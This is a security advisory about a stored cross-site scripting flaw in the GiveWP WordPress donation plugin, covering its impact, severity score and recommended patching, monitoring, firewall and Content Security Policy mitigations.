A high-severity vulnerability has been identified in the GiveWP – Donation Plugin and Fundraising Platform for WordPress. This flaw allows an attacker to inject malicious scripts into the website, which are then executed by unsuspecting users, including administrators. Successful exploitation could lead to the theft of sensitive user data, compromised administrator accounts, and a complete takeover of the affected website.

The vulnerability is a Stored Cross-Site Scripting (XSS) flaw. An unauthenticated attacker can inject a malicious script into the 'name' parameter of a form handled by the plugin. Because the plugin fails to properly sanitize this input before storing it in the database, the script is saved. When an administrator or other user views the page displaying this data, the malicious script executes within their browser, inheriting their privileges and permissions.

This vulnerability is rated as High severity with a CVSS score of 7.2. A successful exploit could have significant business consequences, including reputational damage from a compromised donation platform, theft of donor personal identifiable information (PII), and potential financial fraud. If an attacker hijacks an administrator's session, they could gain full control of the WordPress site, allowing them to deface the website, install backdoors, or pivot to other systems within the network.

Immediate Action: Immediately update the GiveWP – Donation Plugin and Fundraising Platform plugin to the latest version provided by the vendor, which addresses this vulnerability. If the plugin is no longer essential for business operations, it should be deactivated and uninstalled to reduce the attack surface.

Proactive Monitoring: Implement monitoring of web server access logs for suspicious POST requests to plugin-related endpoints that contain script tags or encoded characters in the 'name' parameter. Regularly audit the database for stored malicious code. A Web Application Firewall (WAF) should be configured to detect and block common XSS attack patterns.

Compensating Controls: If immediate patching is not feasible, deploy a Web Application Firewall (WAF) with strict rules to filter for XSS payloads. Additionally, implementing a strong Content Security Policy (CSP) can help mitigate the risk by restricting the domains from which scripts can be executed, potentially preventing the malicious script from functioning.

Public Exploit Available: false

Given the high severity (CVSS 7.2) and the potential for complete site compromise, it is strongly recommended that organizations prioritize applying the security update for the GiveWP plugin across all relevant websites immediately. Although this vulnerability is not currently listed on the CISA KEV catalog, its presence in a widely used fundraising plugin makes it an attractive target for opportunistic attackers. Proactive patching is the most effective defense against potential exploitation and the resulting data breaches or reputational harm.